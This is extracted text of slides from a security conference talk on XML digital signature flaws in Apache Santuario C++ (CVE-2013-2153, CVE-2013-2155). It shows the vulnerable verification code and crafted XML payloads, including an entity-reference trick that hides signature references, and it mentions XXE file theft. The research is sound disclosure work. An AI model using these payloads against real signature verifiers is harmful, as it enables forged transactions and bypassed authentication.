Exploiting It
<Transaction><x:Expiry xmlns:x='http://app/timestamp' time='10:00:00'/><Payee>Bob</Payee><Amount>$100</Amount>
</Transaction>
bool IsExpired(XmlNode trans) {XmlNode expiry = trans.GetElementByName("http://app/timestamp", "Expiry");if(expiry != null) {
return CheckExpiry(expiry); } return false;
}
![Page 55: The Forger’s Art - Hack In The Box Security …...Digital Signatures •HMAC Truncation (CVE-2009-0217) •Signature Wrapping •XSLT –DoS/Remote Code Execution What are XML Digital](https://reader034.vdocuments.net/reader034/viewer/2022042407/5f211a8d6310654b82315bec/html5/thumbnails/55.jpg)
Exploiting It
<Transaction><x:Expiry xmlns:x='http://app/timestamp" time="10:00:00'/><Payee>Bob</Payee><Amount>$100</Amount>
</Transaction>
<Transaction><x:Expiry xmlns:x="http://app/timestamp" time="10:00:00"/><Payee>Bob</Payee><Amount>$100</Amount>
</Transaction>
NS Before = 'http://app/timestamp" time="10:00:00'NS After = 'http://app/timestamp'
![Page 56: The Forger’s Art - Hack In The Box Security …...Digital Signatures •HMAC Truncation (CVE-2009-0217) •Signature Wrapping •XSLT –DoS/Remote Code Execution What are XML Digital](https://reader034.vdocuments.net/reader034/viewer/2022042407/5f211a8d6310654b82315bec/html5/thumbnails/56.jpg)
CVE-2013-2153
• Affected Apache Santuario C++
• Signature Bypass by Hiding References
• Uses an Interesting parsing exploit
• Almost works in Mono, but they got
Lucky!
![Page 57: The Forger’s Art - Hack In The Box Security …...Digital Signatures •HMAC Truncation (CVE-2009-0217) •Signature Wrapping •XSLT –DoS/Remote Code Execution What are XML Digital](https://reader034.vdocuments.net/reader034/viewer/2022042407/5f211a8d6310654b82315bec/html5/thumbnails/57.jpg)
CVE-2013-2153
bool DSIGSignature::verify(void) {
// First thing to do is check the referencesbool referenceCheckResult = mp_signedInfo->verify();
// Check the signaturebool sigVfyResult = verifySignatureOnlyInternal();
return sigVfyResult & referenceCheckResult; }
![Page 58: The Forger’s Art - Hack In The Box Security …...Digital Signatures •HMAC Truncation (CVE-2009-0217) •Signature Wrapping •XSLT –DoS/Remote Code Execution What are XML Digital](https://reader034.vdocuments.net/reader034/viewer/2022042407/5f211a8d6310654b82315bec/html5/thumbnails/58.jpg)
CVE-2013-2153
bool DSIGSignature::verify(void) {
// First thing to do is check the references bool referenceCheckResult = mp_signedInfo->verify();
// Check the signature bool sigVfyResult = verifySignatureOnlyInternal();
return sigVfyResult & referenceCheckResult; }
// ------------------------------------------// Verify each reference element// ------------------------------------------
bool DSIGSignedInfo::verify() { return DSIGReference::verifyReferenceList(mp_referenceList);
}
![Page 59: The Forger’s Art - Hack In The Box Security …...Digital Signatures •HMAC Truncation (CVE-2009-0217) •Signature Wrapping •XSLT –DoS/Remote Code Execution What are XML Digital](https://reader034.vdocuments.net/reader034/viewer/2022042407/5f211a8d6310654b82315bec/html5/thumbnails/59.jpg)
CVE-2013-2153
bool DSIGSignature::verify(void) {
// First thing to do is check the referencesbool referenceCheckResult = mp_signedInfo->verify();
// Check the signaturebool sigVfyResult = verifySignatureOnlyInternal();
return sigVfyResult & referenceCheckResult; }
// ------------------------------------------// Verify each reference element// ------------------------------------------
bool DSIGSignedInfo::verify() { return DSIGReference::verifyReferenceList(mp_referenceList);
}
bool DSIGReference::verifyReferenceList(DSIGReferenceList * lst) { // Run through a list of hashes and checkHash for each onebool res = true; int size = lst->getSize(); for (int i = 0; i < size; ++i) {
if (lst->item(i)->checkHash()) { res = false;
} }
return res; }
![Page 60: The Forger’s Art - Hack In The Box Security …...Digital Signatures •HMAC Truncation (CVE-2009-0217) •Signature Wrapping •XSLT –DoS/Remote Code Execution What are XML Digital](https://reader034.vdocuments.net/reader034/viewer/2022042407/5f211a8d6310654b82315bec/html5/thumbnails/60.jpg)
CVE-2013-2153
bool DSIGSignature::verify(void) {
// First thing to do is check the references bool referenceCheckResult = mp_signedInfo->verify();
// Check the signature bool sigVfyResult = verifySignatureOnlyInternal();
return sigVfyResult & referenceCheckResult; }
// ------------------------------------------// Verify each reference element // ------------------------------------------
bool DSIGSignedInfo::verify() { return DSIGReference::verifyReferenceList(mp_referenceList);
}
bool DSIGReference::verifyReferenceList(DSIGReferenceList * lst) { // Run through a list of hashes and checkHash for each one bool res = true; int size = lst->getSize(); for (int i = 0; i < size; ++i) {
if (lst->item(i)->checkHash()) { res = false;
} }
return res; }
![Page 61: The Forger’s Art - Hack In The Box Security …...Digital Signatures •HMAC Truncation (CVE-2009-0217) •Signature Wrapping •XSLT –DoS/Remote Code Execution What are XML Digital](https://reader034.vdocuments.net/reader034/viewer/2022042407/5f211a8d6310654b82315bec/html5/thumbnails/61.jpg)
CVE-2013-2153
bool DSIGSignature::verify(void) {
// First thing to do is check the references bool referenceCheckResult = mp_signedInfo->verify();
// Check the signature bool sigVfyResult = verifySignatureOnlyInternal();
return sigVfyResult & referenceCheckResult; }
// ------------------------------------------// Verify each reference element // ------------------------------------------
bool DSIGSignedInfo::verify() { return DSIGReference::verifyReferenceList(mp_referenceList);
}
bool DSIGReference::verifyReferenceList(DSIGReferenceList * lst) { // Run through a list of hashes and checkHash for each one bool res = true; int size = lst->getSize(); for (int i = 0; i < size; ++i) {
if (lst->item(i)->checkHash()) { res = false;
} }
return res; }
![Page 62: The Forger’s Art - Hack In The Box Security …...Digital Signatures •HMAC Truncation (CVE-2009-0217) •Signature Wrapping •XSLT –DoS/Remote Code Execution What are XML Digital](https://reader034.vdocuments.net/reader034/viewer/2022042407/5f211a8d6310654b82315bec/html5/thumbnails/62.jpg)
CVE-2013-2153
bool DSIGSignature::verify(void) {
// First thing to do is check the references bool referenceCheckResult = mp_signedInfo->verify();
// Check the signature bool sigVfyResult = verifySignatureOnlyInternal();
return sigVfyResult & referenceCheckResult; }
// ------------------------------------------// Verify each reference element // ------------------------------------------
bool DSIGSignedInfo::verify() { return DSIGReference::verifyReferenceList(mp_referenceList);
}
bool DSIGReference::verifyReferenceList(DSIGReferenceList * lst) { // Run through a list of hashes and checkHash for each one bool res = true; int size = lst->getSize(); for (int i = 0; i < size; ++i) {
if (lst->item(i)->checkHash()) { res = false;
} }
return true; }
![Page 63: The Forger’s Art - Hack In The Box Security …...Digital Signatures •HMAC Truncation (CVE-2009-0217) •Signature Wrapping •XSLT –DoS/Remote Code Execution What are XML Digital](https://reader034.vdocuments.net/reader034/viewer/2022042407/5f211a8d6310654b82315bec/html5/thumbnails/63.jpg)
CVE-2013-2153
void DSIGSignedInfo::load(void) {
DOMNode * child = mp_signedInfoNode->getFirstChild(); // Load rest of SignedInfo...
// Now look at references....child = child->getNextSibling();
// Run through the rest of the elements until donewhile (child != 0 && (child->getNodeType() != DOMNode::ELEMENT_NODE))
// Skip text and commentschild = child->getNextSibling();
if (child != NULL) // Have an element node - should be a reference, so let's load the listmp_referenceList = DSIGReference::loadReferenceListFromXML(mp_env, child);
}
![Page 64: The Forger’s Art - Hack In The Box Security …...Digital Signatures •HMAC Truncation (CVE-2009-0217) •Signature Wrapping •XSLT –DoS/Remote Code Execution What are XML Digital](https://reader034.vdocuments.net/reader034/viewer/2022042407/5f211a8d6310654b82315bec/html5/thumbnails/64.jpg)
CVE-2013-2153
void DSIGSignedInfo::load(void) {
DOMNode * child = mp_signedInfoNode->getFirstChild(); // Load rest of SignedInfo...
// Now look at references.... child = child->getNextSibling();
// Run through the rest of the elements until done while (child != 0 && (child->getNodeType() != DOMNode::ELEMENT_NODE))
// Skip text and comments child = child->getNextSibling();
if (child != NULL) // Have an element node - should be a reference, so let's load the list mp_referenceList = DSIGReference::loadReferenceListFromXML(mp_env, child);
}
![Page 65: The Forger’s Art - Hack In The Box Security …...Digital Signatures •HMAC Truncation (CVE-2009-0217) •Signature Wrapping •XSLT –DoS/Remote Code Execution What are XML Digital](https://reader034.vdocuments.net/reader034/viewer/2022042407/5f211a8d6310654b82315bec/html5/thumbnails/65.jpg)
CVE-2013-2153
void DSIGSignedInfo::load(void) {
DOMNode * child = mp_signedInfoNode->getFirstChild(); // Load rest of SignedInfo...
// Now look at references....child = child->getNextSibling();
// Run through the rest of the elements until donewhile (child != 0 && (child->getNodeType() != DOMNode::ELEMENT_NODE))
// Skip text and commentschild = child->getNextSibling();
if (child != NULL) // Have an element node - should be a reference, so let's load the list mp_referenceList = DSIGReference::loadReferenceListFromXML(mp_env, child);
}
![Page 66: The Forger’s Art - Hack In The Box Security …...Digital Signatures •HMAC Truncation (CVE-2009-0217) •Signature Wrapping •XSLT –DoS/Remote Code Execution What are XML Digital](https://reader034.vdocuments.net/reader034/viewer/2022042407/5f211a8d6310654b82315bec/html5/thumbnails/66.jpg)
CVE-2013-2153
void DSIGSignedInfo::load(void) {
DOMNode * child = mp_signedInfoNode->getFirstChild(); // Load rest of SignedInfo...
// Now look at references.... child = child->getNextSibling();
// Run through the rest of the elements until done while (child != 0 && (child->getNodeType() != DOMNode::ELEMENT_NODE))
// Skip text and comments child = child->getNextSibling();
if (child != NULL) // Have an element node - should be a reference, so let's load the listmp_referenceList = DSIGReference::loadReferenceListFromXML(mp_env, child);
}
![Page 67: The Forger’s Art - Hack In The Box Security …...Digital Signatures •HMAC Truncation (CVE-2009-0217) •Signature Wrapping •XSLT –DoS/Remote Code Execution What are XML Digital](https://reader034.vdocuments.net/reader034/viewer/2022042407/5f211a8d6310654b82315bec/html5/thumbnails/67.jpg)
Parsed DOM Tree
ELEMENT_NODE
<SignedInfo>
ELEMENT_NODE
<C14NMethod>
ELEMENT_NODE
<SignatureMethod>
ELEMENT_NODE
<Reference>
ELEMENT_NODE
<Transforms>
ELEMENT_NODE
<Digest>
DSIGSignedInfo::load()
![Page 68: The Forger’s Art - Hack In The Box Security …...Digital Signatures •HMAC Truncation (CVE-2009-0217) •Signature Wrapping •XSLT –DoS/Remote Code Execution What are XML Digital](https://reader034.vdocuments.net/reader034/viewer/2022042407/5f211a8d6310654b82315bec/html5/thumbnails/68.jpg)
Parsed DOM Tree
ELEMENT_NODE
<SignedInfo>
ELEMENT_NODE
<C14NMethod>
ELEMENT_NODE
<SignatureMethod>
Not an ELEMENT_NODE
ELEMENT_NODE
<Reference>
Ignored
DSIGSignedInfo::load()
![Page 69: The Forger’s Art - Hack In The Box Security …...Digital Signatures •HMAC Truncation (CVE-2009-0217) •Signature Wrapping •XSLT –DoS/Remote Code Execution What are XML Digital](https://reader034.vdocuments.net/reader034/viewer/2022042407/5f211a8d6310654b82315bec/html5/thumbnails/69.jpg)
Parsed DOM Tree
ELEMENT_NODE
<SignedInfo>
ELEMENT_NODE
<C14NMethod>
ELEMENT_NODE
<SignatureMethod>
Not an ELEMENT_NODE
ELEMENT_NODE
<Reference>
DSIGSignedInfo::load()
Ignored
![Page 70: The Forger’s Art - Hack In The Box Security …...Digital Signatures •HMAC Truncation (CVE-2009-0217) •Signature Wrapping •XSLT –DoS/Remote Code Execution What are XML Digital](https://reader034.vdocuments.net/reader034/viewer/2022042407/5f211a8d6310654b82315bec/html5/thumbnails/70.jpg)
DOM Node TypesRef: http://www.w3.org/TR/REC-DOM-Level-1/level-one-core.html#ID-1590626201
Node Type Child Types
Attribute Text, EntityReference
CDATASection None
Comment None
Document Element, ProcessInstruction, Comment, DocumentType
Element Element, Text, Comment, ProcessingInstruction, CDATASection, EntityReference
Entity Element, ProcessingInstruction, Comment, Text, CDATASection, EntityReference
EntityReference Element, ProcessingInstruction, Comment, Text, CDATASection, EntityReference
ProcessingInstruction None
![Page 71: The Forger’s Art - Hack In The Box Security …...Digital Signatures •HMAC Truncation (CVE-2009-0217) •Signature Wrapping •XSLT –DoS/Remote Code Execution What are XML Digital](https://reader034.vdocuments.net/reader034/viewer/2022042407/5f211a8d6310654b82315bec/html5/thumbnails/71.jpg)
DOM Node TypesRef: http://www.w3.org/TR/REC-DOM-Level-1/level-one-core.html#ID-1590626201
Node Type Child Types
Attribute Text, EntityReference
CDATASection None
Comment None
Document Element, ProcessInstruction, Comment, DocumentType
Element Element, Text, Comment, ProcessingInstruction, CDATASection, EntityReference
Entity Element, ProcessingInstruction, Comment, Text, CDATASection, EntityReference
EntityReference Element, ProcessingInstruction, Comment, Text, CDATASection, EntityReference
ProcessingInstruction None
![Page 72: The Forger’s Art - Hack In The Box Security …...Digital Signatures •HMAC Truncation (CVE-2009-0217) •Signature Wrapping •XSLT –DoS/Remote Code Execution What are XML Digital](https://reader034.vdocuments.net/reader034/viewer/2022042407/5f211a8d6310654b82315bec/html5/thumbnails/72.jpg)
DOM Node TypesRef: http://www.w3.org/TR/REC-DOM-Level-1/level-one-core.html#ID-1590626201
Node Type Child Types
Attribute Text, EntityReference
CDATASection None
Comment None
Document Element, ProcessInstruction, Comment, DocumentType
Element Element, Text, Comment, ProcessingInstruction, CDATASection, EntityReference
Entity Element, ProcessingInstruction, Comment, Text, CDATASection, EntityReference
EntityReference Element, ProcessingInstruction, Comment, Text, CDATASection, EntityReference
ProcessingInstruction None
![Page 73: The Forger’s Art - Hack In The Box Security …...Digital Signatures •HMAC Truncation (CVE-2009-0217) •Signature Wrapping •XSLT –DoS/Remote Code Execution What are XML Digital](https://reader034.vdocuments.net/reader034/viewer/2022042407/5f211a8d6310654b82315bec/html5/thumbnails/73.jpg)
Entity References
ELEMENT_NODE
<good>
ELEMENT_NODE
<a>
ENTITY_REF_NODE
&ent;
ELEMENT_NODE
<b>
ELEMENT_NODE
<c>
<!DOCTYPE good [<!ENTITY ent "<b/>">
]><good><a/>&ent;<c/>
</good>
![Page 74: The Forger’s Art - Hack In The Box Security …...Digital Signatures •HMAC Truncation (CVE-2009-0217) •Signature Wrapping •XSLT –DoS/Remote Code Execution What are XML Digital](https://reader034.vdocuments.net/reader034/viewer/2022042407/5f211a8d6310654b82315bec/html5/thumbnails/74.jpg)
Canonical Entity References
Ref: http://www.w3.org/TR/xml-c14n
![Page 75: The Forger’s Art - Hack In The Box Security …...Digital Signatures •HMAC Truncation (CVE-2009-0217) •Signature Wrapping •XSLT –DoS/Remote Code Execution What are XML Digital](https://reader034.vdocuments.net/reader034/viewer/2022042407/5f211a8d6310654b82315bec/html5/thumbnails/75.jpg)
Canonical Entity References
Ref: http://www.w3.org/TR/xml-c14n
![Page 76: The Forger’s Art - Hack In The Box Security …...Digital Signatures •HMAC Truncation (CVE-2009-0217) •Signature Wrapping •XSLT –DoS/Remote Code Execution What are XML Digital](https://reader034.vdocuments.net/reader034/viewer/2022042407/5f211a8d6310654b82315bec/html5/thumbnails/76.jpg)
Entity References after C14N
ELEMENT_NODE
<good>
ELEMENT_NODE
<a>
ELEMENT_NODE
<b>
ELEMENT_NODE
<c>
<good><a/><b/><c/>
</good>
![Page 77: The Forger’s Art - Hack In The Box Security …...Digital Signatures •HMAC Truncation (CVE-2009-0217) •Signature Wrapping •XSLT –DoS/Remote Code Execution What are XML Digital](https://reader034.vdocuments.net/reader034/viewer/2022042407/5f211a8d6310654b82315bec/html5/thumbnails/77.jpg)
Exploiting It
<good><Signature xmlns="http://www.w3.org/2000/09/xmldsig#">
<SignedInfo><CanonicalizationMethod/><SignatureMethod/><Reference URI="">
<Transforms/><DigestMethod/><DigestValue>Bo0b5...</DigestValue>
</Reference></SignedInfo><SignatureValue>K4TYp...</SignatureValue>
</Signature></good>
![Page 78: The Forger’s Art - Hack In The Box Security …...Digital Signatures •HMAC Truncation (CVE-2009-0217) •Signature Wrapping •XSLT –DoS/Remote Code Execution What are XML Digital](https://reader034.vdocuments.net/reader034/viewer/2022042407/5f211a8d6310654b82315bec/html5/thumbnails/78.jpg)
Exploiting It
<!DOCTYPE good [<!ENTITY hacked "<Reference URI="">...</Reference>">
]><good>
<Signature xmlns="http://www.w3.org/2000/09/xmldsig#"><SignedInfo>
<CanonicalizationMethod/><SignatureMethod/><Reference URI="">
<Transforms/><DigestMethod/><DigestValue>Bo0B5...</DigestValue>
</Reference></SignedInfo><SignatureValue>K4TYp...</SignatureValue>
</Signature></good>
![Page 79: The Forger’s Art - Hack In The Box Security …...Digital Signatures •HMAC Truncation (CVE-2009-0217) •Signature Wrapping •XSLT –DoS/Remote Code Execution What are XML Digital](https://reader034.vdocuments.net/reader034/viewer/2022042407/5f211a8d6310654b82315bec/html5/thumbnails/79.jpg)
Exploiting It
<!DOCTYPE good [<!ENTITY hacked "<Reference URI="">...</Reference>">
]><good>
<Signature xmlns="http://www.w3.org/2000/09/xmldsig#"><SignedInfo>
<CanonicalizationMethod/><SignatureMethod/>&hacked;
</SignedInfo><SignatureValue>K4TYp...</SignatureValue>
</Signature></good>
![Page 80: The Forger’s Art - Hack In The Box Security …...Digital Signatures •HMAC Truncation (CVE-2009-0217) •Signature Wrapping •XSLT –DoS/Remote Code Execution What are XML Digital](https://reader034.vdocuments.net/reader034/viewer/2022042407/5f211a8d6310654b82315bec/html5/thumbnails/80.jpg)
Parsed DOM Tree
ELEMENT_NODE
<SignedInfo>
ELEMENT_NODE
<C14NMethod>
ELEMENT_NODE
<SignatureMethod>
ENTITY_REF_NODE
&hacked;
ELEMENT_NODE
<Reference>
Ignored
DSIGSignedInfo::load()
![Page 81: The Forger’s Art - Hack In The Box Security …...Digital Signatures •HMAC Truncation (CVE-2009-0217) •Signature Wrapping •XSLT –DoS/Remote Code Execution What are XML Digital](https://reader034.vdocuments.net/reader034/viewer/2022042407/5f211a8d6310654b82315bec/html5/thumbnails/81.jpg)
CVE-2013-XXXX
• Affected: Everyone!
• DTD processing during transformation
• Can lead to trivial XML DoS attacks
• Also file stealing through OOB XXE
![Page 82: The Forger’s Art - Hack In The Box Security …...Digital Signatures •HMAC Truncation (CVE-2009-0217) •Signature Wrapping •XSLT –DoS/Remote Code Execution What are XML Digital](https://reader034.vdocuments.net/reader034/viewer/2022042407/5f211a8d6310654b82315bec/html5/thumbnails/82.jpg)
Transforms
XSLT
Base64
XPath
Envelope
Inclusive
Exclusive
All Transforms
C14N
![Page 83: The Forger’s Art - Hack In The Box Security …...Digital Signatures •HMAC Truncation (CVE-2009-0217) •Signature Wrapping •XSLT –DoS/Remote Code Execution What are XML Digital](https://reader034.vdocuments.net/reader034/viewer/2022042407/5f211a8d6310654b82315bec/html5/thumbnails/83.jpg)
Transform Chain
<SignedInfo><CanonicalizationMethod/><SignatureMethod/><Reference URI=""><Transforms><Transform
Algorithm="http://www.w3.org/2000/09/xmldsig#base64" /><Transform
Algorithm="http://www.w3.org/TR/2001/REC-xml-c14n-20010315" /></Transforms><DigestMethod Algorithm="http://www.w3.org/2000/09/xmldsig#sha1" /><DigestValue>l8bqyMiBpK9m4zbmKnl2b2lZxfI=</DigestValue></Reference></SignedInfo>
![Page 84: The Forger’s Art - Hack In The Box Security …...Digital Signatures •HMAC Truncation (CVE-2009-0217) •Signature Wrapping •XSLT –DoS/Remote Code Execution What are XML Digital](https://reader034.vdocuments.net/reader034/viewer/2022042407/5f211a8d6310654b82315bec/html5/thumbnails/84.jpg)
Transform Input/Output
Transform Input Type Output Type
C14N XML Node Set Octet Stream
Base64 Octet Stream Octet Stream
Envelope XML Node Set XML Node Set
XPath XML Node Set XML Node Set
XSLT Octet Stream Octet Stream
Base64 C14N
XML
Node Node
Node
Transformation Chain
XML
Node Node
Node
InputOutput
How can we do this?
![Page 85: The Forger’s Art - Hack In The Box Security …...Digital Signatures •HMAC Truncation (CVE-2009-0217) •Signature Wrapping •XSLT –DoS/Remote Code Execution What are XML Digital](https://reader034.vdocuments.net/reader034/viewer/2022042407/5f211a8d6310654b82315bec/html5/thumbnails/85.jpg)
Reparsing XML
XSECTXFMInputSource is(chain, false);
// Create a XercesParser and parse!XercesDOMParser parser; parser.setDoNamespaces(true); parser.setCreateEntityReferenceNodes(true); parser.setDoSchema(true); parser.parse(is);
xsecsize_t errorCount = parser.getErrorCount(); if (errorCount > 0)
throw XSECException(XSECException::XSLError); mp_parsedDoc = parser.adoptDocument();
![Page 86: The Forger’s Art - Hack In The Box Security …...Digital Signatures •HMAC Truncation (CVE-2009-0217) •Signature Wrapping •XSLT –DoS/Remote Code Execution What are XML Digital](https://reader034.vdocuments.net/reader034/viewer/2022042407/5f211a8d6310654b82315bec/html5/thumbnails/86.jpg)
Reparsing XML
XSECTXFMInputSource is(chain, false);
// Create a XercesParser and parse!XercesDOMParser parser; parser.setDoNamespaces(true); parser.setCreateEntityReferenceNodes(true); parser.setDoSchema(true); parser.parse(is);
xsecsize_t errorCount = parser.getErrorCount(); if (errorCount > 0)
throw XSECException(XSECException::XSLError); mp_parsedDoc = parser.adoptDocument();
DTD Parsing not Disabled!
![Page 87: The Forger’s Art - Hack In The Box Security …...Digital Signatures •HMAC Truncation (CVE-2009-0217) •Signature Wrapping •XSLT –DoS/Remote Code Execution What are XML Digital](https://reader034.vdocuments.net/reader034/viewer/2022042407/5f211a8d6310654b82315bec/html5/thumbnails/87.jpg)
Demo Time!
![Page 88: The Forger’s Art - Hack In The Box Security …...Digital Signatures •HMAC Truncation (CVE-2009-0217) •Signature Wrapping •XSLT –DoS/Remote Code Execution What are XML Digital](https://reader034.vdocuments.net/reader034/viewer/2022042407/5f211a8d6310654b82315bec/html5/thumbnails/88.jpg)
SignedInfo Verification
![Page 89: The Forger’s Art - Hack In The Box Security …...Digital Signatures •HMAC Truncation (CVE-2009-0217) •Signature Wrapping •XSLT –DoS/Remote Code Execution What are XML Digital](https://reader034.vdocuments.net/reader034/viewer/2022042407/5f211a8d6310654b82315bec/html5/thumbnails/89.jpg)
CVE-2013-2155
• Affected Apache C++ (again)
• Circumvented "fix" for HMAC
Truncation (CVE-2009-0217)
• By sheer ineptitude it ended up an DoS
rather than a Signature Bypass
![Page 90: The Forger’s Art - Hack In The Box Security …...Digital Signatures •HMAC Truncation (CVE-2009-0217) •Signature Wrapping •XSLT –DoS/Remote Code Execution What are XML Digital](https://reader034.vdocuments.net/reader034/viewer/2022042407/5f211a8d6310654b82315bec/html5/thumbnails/90.jpg)
Background CVE-2009-0217
![Page 91: The Forger’s Art - Hack In The Box Security …...Digital Signatures •HMAC Truncation (CVE-2009-0217) •Signature Wrapping •XSLT –DoS/Remote Code Execution What are XML Digital](https://reader034.vdocuments.net/reader034/viewer/2022042407/5f211a8d6310654b82315bec/html5/thumbnails/91.jpg)
<SignedInfo> <CanonicalizationMethod
Algorithm="http://www.w3.org/TR/2001/REC-xml-c14n-20010315"/> <SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#hmac-sha1">
<HMACOutputLength>80</HMACOutputLength></SignatureMethod>
...</SignedInfo>
HMAC Truncation
00112233445566778899AABBCCDDEEFF00112233
00112233445566778899
Truncate to 80 bits
![Page 92: The Forger’s Art - Hack In The Box Security …...Digital Signatures •HMAC Truncation (CVE-2009-0217) •Signature Wrapping •XSLT –DoS/Remote Code Execution What are XML Digital](https://reader034.vdocuments.net/reader034/viewer/2022042407/5f211a8d6310654b82315bec/html5/thumbnails/92.jpg)
<SignedInfo> <CanonicalizationMethod
Algorithm="http://www.w3.org/TR/2001/REC-xml-c14n-20010315"/> <SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#hmac-sha1">
<HMACOutputLength>0</HMACOutputLength></SignatureMethod>
...</SignedInfo>
HMAC Truncation
00112233445566778899AABBCCDDEEFF00112233
Truncate to 0 bits
![Page 93: The Forger’s Art - Hack In The Box Security …...Digital Signatures •HMAC Truncation (CVE-2009-0217) •Signature Wrapping •XSLT –DoS/Remote Code Execution What are XML Digital](https://reader034.vdocuments.net/reader034/viewer/2022042407/5f211a8d6310654b82315bec/html5/thumbnails/93.jpg)
CVE-2013-2155
while (child && strcmp(getDSIGLocalName(child, "HMACOutputLength") != 0)child = child->getNextSibling();
if (child) { // Have a max output value!DOMNode *textNode = child->getFirstChild(); if (textNode) {
m_HMACOutputLength = atoi(textNode->getNodeValue()); }
}
![Page 94: The Forger’s Art - Hack In The Box Security …...Digital Signatures •HMAC Truncation (CVE-2009-0217) •Signature Wrapping •XSLT –DoS/Remote Code Execution What are XML Digital](https://reader034.vdocuments.net/reader034/viewer/2022042407/5f211a8d6310654b82315bec/html5/thumbnails/94.jpg)
CVE-2013-2155
while (child && strcmp(getDSIGLocalName(child, "HMACOutputLength") != 0)child = child->getNextSibling();
if (child) { // Have a max output value! DOMNode *textNode = child->getFirstChild(); if (textNode) {
m_HMACOutputLength = atoi(textNode->getNodeValue()); }
}
![Page 95: The Forger’s Art - Hack In The Box Security …...Digital Signatures •HMAC Truncation (CVE-2009-0217) •Signature Wrapping •XSLT –DoS/Remote Code Execution What are XML Digital](https://reader034.vdocuments.net/reader034/viewer/2022042407/5f211a8d6310654b82315bec/html5/thumbnails/95.jpg)
CVE-2013-2155
while (child && strcmp(getDSIGLocalName(child, "HMACOutputLength") != 0)child = child->getNextSibling();
if (child) { // Have a max output value!DOMNode *textNode = child->getFirstChild(); if (textNode) {
m_HMACOutputLength = atoi(textNode->getNodeValue()); }
}
![Page 96: The Forger’s Art - Hack In The Box Security …...Digital Signatures •HMAC Truncation (CVE-2009-0217) •Signature Wrapping •XSLT –DoS/Remote Code Execution What are XML Digital](https://reader034.vdocuments.net/reader034/viewer/2022042407/5f211a8d6310654b82315bec/html5/thumbnails/96.jpg)
CVE-2013-2155
while (child && strcmp(getDSIGLocalName(child, "HMACOutputLength") != 0)child = child->getNextSibling();
if (child) { // Have a max output value! DOMNode *textNode = child->getFirstChild(); if (textNode) {
m_HMACOutputLength = atoi(textNode->getNodeValue()); }
}
So m_HMACOutputLength is an int?
![Page 97: The Forger’s Art - Hack In The Box Security …...Digital Signatures •HMAC Truncation (CVE-2009-0217) •Signature Wrapping •XSLT –DoS/Remote Code Execution What are XML Digital](https://reader034.vdocuments.net/reader034/viewer/2022042407/5f211a8d6310654b82315bec/html5/thumbnails/97.jpg)
CVE-2013-2155
while (child && strcmp(getDSIGLocalName(child, "HMACOutputLength") != 0)child = child->getNextSibling();
if (child) { // Have a max output value! DOMNode *textNode = tmpSOV->getFirstChild(); if (textNode) {
m_HMACOutputLength = atoi(textNode->getNodeValue()); }
}
// First find the appropriate handler for the URIXSECAlgorithmHandler* handler =
mapURIToHandler(mp_signedInfo->getAlgorithmURI());
bool sigVfyRet = handler->verifyBase64Signature(m_signatureValueSB.rawCharBuffer(),mp_signedInfo->getHMACOutputLength(),mp_signingKey);
![Page 98: The Forger’s Art - Hack In The Box Security …...Digital Signatures •HMAC Truncation (CVE-2009-0217) •Signature Wrapping •XSLT –DoS/Remote Code Execution What are XML Digital](https://reader034.vdocuments.net/reader034/viewer/2022042407/5f211a8d6310654b82315bec/html5/thumbnails/98.jpg)
CVE-2013-2155
while (child && strcmp(getDSIGLocalName(child, "HMACOutputLength") != 0)child = child->getNextSibling();
if (child) { // Have a max output value! DOMNode *textNode = tmpSOV->getFirstChild(); if (textNode) {
m_HMACOutputLength = atoi(textNode->getNodeValue()); }
}
// First find the appropriate handler for the URI XSECAlgorithmHandler* handler =
mapURIToHandler(mp_signedInfo->getAlgorithmURI());
bool sigVfyRet = handler->verifyBase64Signature(m_signatureValueSB.rawCharBuffer(),mp_signedInfo->getHMACOutputLength(),mp_signingKey);
![Page 99: The Forger’s Art - Hack In The Box Security …...Digital Signatures •HMAC Truncation (CVE-2009-0217) •Signature Wrapping •XSLT –DoS/Remote Code Execution What are XML Digital](https://reader034.vdocuments.net/reader034/viewer/2022042407/5f211a8d6310654b82315bec/html5/thumbnails/99.jpg)
CVE-2013-2155
bool verifyBase64Signature(const char * sig, unsigned int outputLen, const char * hash, unsigned int hashLen, XSECCryptoKeyType type) {
if(type == XSECCryptoKey::KEY_HMAC) : // FIX: CVE-2009-0217if (outputLen > 0 && (outputLen < 80 || outputLen < hashLen / 2)) {
throw XSECException("HMACOutputLength set to unsafe value."); }
return compareBase64StringToRaw(sig, hash, hashLen, outputLen);}
![Page 100: The Forger’s Art - Hack In The Box Security …...Digital Signatures •HMAC Truncation (CVE-2009-0217) •Signature Wrapping •XSLT –DoS/Remote Code Execution What are XML Digital](https://reader034.vdocuments.net/reader034/viewer/2022042407/5f211a8d6310654b82315bec/html5/thumbnails/100.jpg)
CVE-2013-2155
bool verifyBase64Signature(const char * sig, unsigned int outputLen, const char * hash, unsigned int hashLen, XSECCryptoKeyType type) {
if(type == XSECCryptoKey::KEY_HMAC) : // FIX: CVE-2009-0217if (outputLen > 0 && (outputLen < 80 || outputLen < hashLen / 2)) {
throw XSECException("HMACOutputLength set to unsafe value."); }
return compareBase64StringToRaw(sig, hash, hashLen, outputLen);}
![Page 101: The Forger’s Art - Hack In The Box Security …...Digital Signatures •HMAC Truncation (CVE-2009-0217) •Signature Wrapping •XSLT –DoS/Remote Code Execution What are XML Digital](https://reader034.vdocuments.net/reader034/viewer/2022042407/5f211a8d6310654b82315bec/html5/thumbnails/101.jpg)
CVE-2013-2155
bool verifyBase64Signature(const char * sig, unsigned int outputLen, const char * hash, unsigned int hashLen, XSECCryptoKeyType type) {
if(type == XSECCryptoKey::KEY_HMAC) : // FIX: CVE-2009-0217if (outputLen > 0 && (outputLen < 80 || outputLen < hashLen / 2)) {
throw XSECException("HMACOutputLength set to unsafe value."); }
return compareBase64StringToRaw(sig, hash, hashLen, outputLen);}
![Page 102: The Forger’s Art - Hack In The Box Security …...Digital Signatures •HMAC Truncation (CVE-2009-0217) •Signature Wrapping •XSLT –DoS/Remote Code Execution What are XML Digital](https://reader034.vdocuments.net/reader034/viewer/2022042407/5f211a8d6310654b82315bec/html5/thumbnails/102.jpg)
CVE-2013-2155bool compareBase64StringToRaw(
const char * b64Str,unsigned char * raw,unsigned int rawLen,unsigned int maxCompare) {
unsigned int maxBytes, maxBits;div_t d = {0};if(maxCompare == 0) {
maxCompare = rawLen;}
d = div(maxCompare, 8);maxBytes = d.quot;maxBits = d.rem;
return compareBits(decode(b64Str), raw, maxBytes, maxBits);}
